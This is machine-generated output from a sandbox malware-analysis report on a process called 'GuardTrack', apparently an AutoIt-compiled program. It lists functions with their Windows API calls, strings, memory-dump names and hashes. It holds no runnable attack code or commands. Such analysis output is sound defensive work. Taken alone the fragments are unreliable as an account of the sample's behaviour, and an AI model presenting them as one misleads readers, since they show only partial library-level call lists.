ReleaseDC.USER32(00000000,00000000), ref: 0060C36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0060C385
MulDiv.KERNEL32(000009EC,?,?), ref: 0060C397

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: ce604f5a0c6838c9e96a1f690384cc255eabc4e87b2cbd6f6d133603cdd3e615
Instruction ID: 6bca91afbd025e8bb0234de54cb904b66dff99c6a7eb650c1a6ea0e910b4d9df
Opcode Fuzzy Hash: ce604f5a0c6838c9e96a1f690384cc255eabc4e87b2cbd6f6d133603cdd3e615
Instruction Fuzzy Hash: 48014475E40218BBEF149BA59C49B9EBFB9EF49761F004065FF08A7280D6719D10CFA0

Function 0063C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 005B16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005B1729
Part of subcall function 005B16CF: SelectObject.GDI32(?,00000000), ref: 005B1738
Part of subcall function 005B16CF: BeginPath.GDI32(?), ref: 005B174F
Part of subcall function 005B16CF: SelectObject.GDI32(?,00000000), ref: 005B1778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0063C57C
LineTo.GDI32(00000000,00000003,?), ref: 0063C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0063C59E
LineTo.GDI32(00000000,00000000,?), ref: 0063C5AE
EndPath.GDI32(00000000), ref: 0063C5BE
StrokePath.GDI32(00000000), ref: 0063C5CE

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 4131e19b517348329824ee8365affef25b321f1c56117c962820cee2f9da8116
Instruction ID: f0846ca11bdf90781d7878939395de274d5a9a8efe6a5b309a05397508ca5d84
Opcode Fuzzy Hash: 4131e19b517348329824ee8365affef25b321f1c56117c962820cee2f9da8116
Instruction Fuzzy Hash: 9911CC7600411DBFEB129F90DC48EDA7F6EEF05364F048061BA1856161D771AE65DBA0

Function 005D07BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 005D07EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 005D07F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 005D07FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 005D080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 005D0812
MapVirtualKeyW.USER32(00000012,00000000), ref: 005D081A

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 95520d39a63c37f22b4a8f9f724ecf3aeaa5172955ce23051922569acef65bc3
Instruction ID: d318eba7fd63f7f585438155b1d81304e2c378087b726c105e072664a4b15beb
Opcode Fuzzy Hash: 95520d39a63c37f22b4a8f9f724ecf3aeaa5172955ce23051922569acef65bc3
Instruction Fuzzy Hash: 38016CB09027597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5

Function 006159A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006159B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006159CA
GetWindowThreadProcessId.USER32(?,?), ref: 006159D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006159E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006159F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006159F9

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: da2323e69fa877ffa4c598b8ce39590fb7a642a152619324ae6b111f12d87acd
Instruction ID: 1ef99cb05fa8c4e7e01c075e9b2a970fdbb1ef9cd302bec4b0853d13fbb06029
Opcode Fuzzy Hash: da2323e69fa877ffa4c598b8ce39590fb7a642a152619324ae6b111f12d87acd
Instruction Fuzzy Hash: 4FF01D3A241168BBF7215B929C0DEEF7E7DEBC7B11F001159FA0592150D7B01A1186B5

Function 006177EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 006177FE
EnterCriticalSection.KERNEL32(?,?,005BC2B6,?,?), ref: 0061780F
TerminateThread.KERNEL32(00000000,000001F6,?,005BC2B6,?,?), ref: 0061781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,005BC2B6,?,?), ref: 00617829

Part of subcall function 006171F0: CloseHandle.KERNEL32(00000000,?,00617836,?,005BC2B6,?,?), ref: 006171FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 0061783C
LeaveCriticalSection.KERNEL32(?,?,005BC2B6,?,?), ref: 00617843

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 9de0dffcaa71bac98d3a48a4a94882ce193bd5c394cd70cc5c39203ea0b3c437
Instruction ID: 70e1dbe122353919d443a35a106fc45c0aa15ddd5c7c1876f3903ecdd1f7d3c3
Opcode Fuzzy Hash: 9de0dffcaa71bac98d3a48a4a94882ce193bd5c394cd70cc5c39203ea0b3c437
Instruction Fuzzy Hash: 1CF05E3A155222ABE7512B64EC8CAEB777BFF46702B182825F203950A0CBB55941DB60

Function 0060954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00609555
UnloadUserProfile.USERENV(?,?), ref: 00609561
CloseHandle.KERNEL32(?), ref: 0060956A
CloseHandle.KERNEL32(?), ref: 00609572
GetProcessHeap.KERNEL32(00000000,?), ref: 0060957B
HeapFree.KERNEL32(00000000), ref: 00609582

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: c9b6db6ecfcad5a113f33d129a33744072e551cce24115e704a9c1b3cab2caa9
Instruction ID: a07b191ffed48d30fb959fcf8447cbd290de9919d75df30e78e6eb74f035adaa
Opcode Fuzzy Hash: c9b6db6ecfcad5a113f33d129a33744072e551cce24115e704a9c1b3cab2caa9
Instruction Fuzzy Hash: 64E0E53E004122BBEB012FE1EC0C95ABF3AFF4A722B105620F71582470CB32A460DB50

Function 00628CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00628CFD
CharUpperBuffW.USER32(?,?), ref: 00628E0C
VariantClear.OLEAUT32(?), ref: 00628F84

Part of subcall function 00617B1D: VariantInit.OLEAUT32(00000000), ref: 00617B5D
Part of subcall function 00617B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00617B66
Part of subcall function 00617B1D: VariantClear.OLEAUT32(00000000), ref: 00617B72

Strings

Incorrect Parameter format, xrefs: 00628D35, 00628EF7
AUTOIT.ERROR, xrefs: 00628E12

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: a5e58095646edfff4ef0ea12f6f66de7f7b75468bc99af12e87dfe70410e99d5
Instruction ID: 6f0eb79aebf534f98e74eaadfb35085ba1226abdc6d1bd71adf61a98bd5a3b6a
Opcode Fuzzy Hash: a5e58095646edfff4ef0ea12f6f66de7f7b75468bc99af12e87dfe70410e99d5
Instruction Fuzzy Hash: 00917B746047019FC710DF24C98499ABBE6BFD9354F14892EF8898B3A2DB30E945CF52

Function 0061323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005C436A: _wcscpy.LIBCMT ref: 005C438D

_memset.LIBCMT ref: 0061332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0061335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00613410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0061343E

Strings

0, xrefs: 0061331A

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 7e94a7381527dccdbc36eb44dc18a27c90b148f67df53725ce857374501446ef
Instruction ID: 332a7305cecb2d63cc8e046c9a672a87a797f4c04dee46da863cdb69a122fb1f
Opcode Fuzzy Hash: 7e94a7381527dccdbc36eb44dc18a27c90b148f67df53725ce857374501446ef
Instruction Fuzzy Hash: 8351D6315083619FD725AF28D845AEB7BE6AF85710F08452EF896D3391DB30CE84C756

Function 0063DF09 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00628A0E,?,00000000), ref: 0063DF71
SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00628A0E,?,00000000,00000000), ref: 0063DFA7
GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 0063DFB8
SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00628A0E,?,00000000,00000000), ref: 0063E03A

Strings

DllGetClassObject, xrefs: 0063DFAD

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: ac61537657eebd15d2a2d160207a6ca8497be647bd6cbcb1d7bc995b98652e5f
Instruction ID: eebea2e6b615e77d21dce1779a8bcb95e0b9d854e7267356a19ed8dd22de5823
Opcode Fuzzy Hash: ac61537657eebd15d2a2d160207a6ca8497be647bd6cbcb1d7bc995b98652e5f
Instruction Fuzzy Hash: CD419C75600204EFDB19CF55C884AAA7BAAEF44310F1480AEED059F286D7F2DD54CBE0

Function 00612EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00612F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00612F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00612FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00677890,00000000), ref: 00613012

Strings

0, xrefs: 00612F5C

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 38c31170a9adeca397f6e6e8f0ea5ec273e705173f5974e23dedf6db27daf3a2
Instruction ID: 74b442c3268cdf9e2178d8660f3fa7b7c98ffd661ba1c751fd218508b473e9e6
Opcode Fuzzy Hash: 38c31170a9adeca397f6e6e8f0ea5ec273e705173f5974e23dedf6db27daf3a2
Instruction Fuzzy Hash: A241E1312083529FD720DF24C894F9ABBE6AF89310F084A1EF56697391DB70EA45CB56

Function 0062DE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0062DEAE

Part of subcall function 005C1462: _memmove.LIBCMT ref: 005C14B0

Strings

cdecl, xrefs: 0062DF05
winapi, xrefs: 0062DF1F
stdcall, xrefs: 0062DF30
none, xrefs: 0062DF89

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 064ea334e629d228c823bf7487e0a0770db4120b4cff892888bf0e20d24735ec
Instruction ID: feb2af44bcf59c7ef1450a2541d0690ece174e674855ec5a438c2caef94063dd
Opcode Fuzzy Hash: 064ea334e629d228c823bf7487e0a0770db4120b4cff892888bf0e20d24735ec
Instruction Fuzzy Hash: FA319270500A26AFCF10EF94DA40AEEB7B6FF55310B10862AF866977D1DB71A905CF84

Function 00609A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

Part of subcall function 0060B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0060B7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00609ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00609ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00609B0F

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

Strings

ComboBox, xrefs: 00609A56
ListBox, xrefs: 00609A8B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: f52d50d38f8af2e2df8a75d0b98ca3b8582b40c424ca451553c7f50179e4f244
Instruction ID: 3ab9c311a4218baafa2f3fd0095c418808653a41bc2317adba7ffe0a7b902c0d
Opcode Fuzzy Hash: f52d50d38f8af2e2df8a75d0b98ca3b8582b40c424ca451553c7f50179e4f244
Instruction Fuzzy Hash: E221B6759411047FDB18EBB4DC49DFFBB6AEF86360F104119F815A72D2DB344D069660

Function 00621EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00621F18
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00621F3E
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00621F6E
InternetCloseHandle.WININET(00000000), ref: 00621FB5

Part of subcall function 00622B4F: GetLastError.KERNEL32(?,?,00621EE3,00000000,00000000,00000001), ref: 00622B64
Part of subcall function 00622B4F: SetEvent.KERNEL32(?,?,00621EE3,00000000,00000000,00000001), ref: 00622B79

Strings

, xrefs: 00621F5F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 37de02d2519f8c56d15c43f51e7fd9a8595aa05977d2224e94e1b2ebe37ce8a4
Instruction ID: c6e3ffb65c51bdcc93ba01bd427d4b4d2d9b31b078cea19974d95e4b5ac34132
Opcode Fuzzy Hash: 37de02d2519f8c56d15c43f51e7fd9a8595aa05977d2224e94e1b2ebe37ce8a4
Instruction Fuzzy Hash: A421F2B5508628BFF7119F20ED95EBF77EEEB4A744F10401AF9059A200DB349D059FA2

Function 00636A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 005B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005B214F
Part of subcall function 005B2111: GetStockObject.GDI32(00000011), ref: 005B2163
Part of subcall function 005B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 005B216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00636A86
LoadLibraryW.KERNEL32(?), ref: 00636A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00636AA2
DestroyWindow.USER32(?), ref: 00636AAA

Strings

SysAnimate32, xrefs: 00636A61

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: f1836eca7c34138989348d74f60cafb8ef997b47960a37693bcb1e6b47900ea5
Instruction ID: ff95ea9bb2a7335c15c35386bea37c38c0ef2a81108907efd1c48735c63b85dd
Opcode Fuzzy Hash: f1836eca7c34138989348d74f60cafb8ef997b47960a37693bcb1e6b47900ea5
Instruction Fuzzy Hash: 3D218B71204209BFEF108F64DC80EFB77AAEB5A324F10D618FA51A3290D3719C5197A0

Function 00617357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00617377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006173AA
GetStdHandle.KERNEL32(0000000C), ref: 006173BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006173F6

Strings

nul, xrefs: 006173F1

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 43746aa5c70c3e0d8877bc97db128a509e101e8baef203e0aaf5d0d49f864a47
Instruction ID: 1fa0d4b9ee4b32a9b578cf362754c24a0a380be524485fc868744afbb6e498e0
Opcode Fuzzy Hash: 43746aa5c70c3e0d8877bc97db128a509e101e8baef203e0aaf5d0d49f864a47
Instruction Fuzzy Hash: DC218174508306ABDB208F68DC05ADA7BF6AF55720F284B19FDB0D72D0D7709991EB60

Function 00617425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00617444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00617476
GetStdHandle.KERNEL32(000000F6), ref: 00617487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006174C1

Strings

nul, xrefs: 006174BC

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 8aec60e88078b52d16b603530f082a5b44d20f6928f1159852e4a4cbe9de74c9
Instruction ID: da6680eba6790e8a70497a3714bddd474e5c7b29766af8fe700a0a3fcb05056b
Opcode Fuzzy Hash: 8aec60e88078b52d16b603530f082a5b44d20f6928f1159852e4a4cbe9de74c9
Instruction Fuzzy Hash: 7321C1356083069BDB209F689C44ADA7BFAAF55730F280B19FDA1D73D0DB709981CB50

Function 0061B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0061B297
